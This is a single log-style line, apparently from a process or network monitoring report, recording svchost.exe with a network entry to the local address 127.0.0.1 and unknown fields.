              - svchost.exe: network: 127.0.0.1 unknown unknown
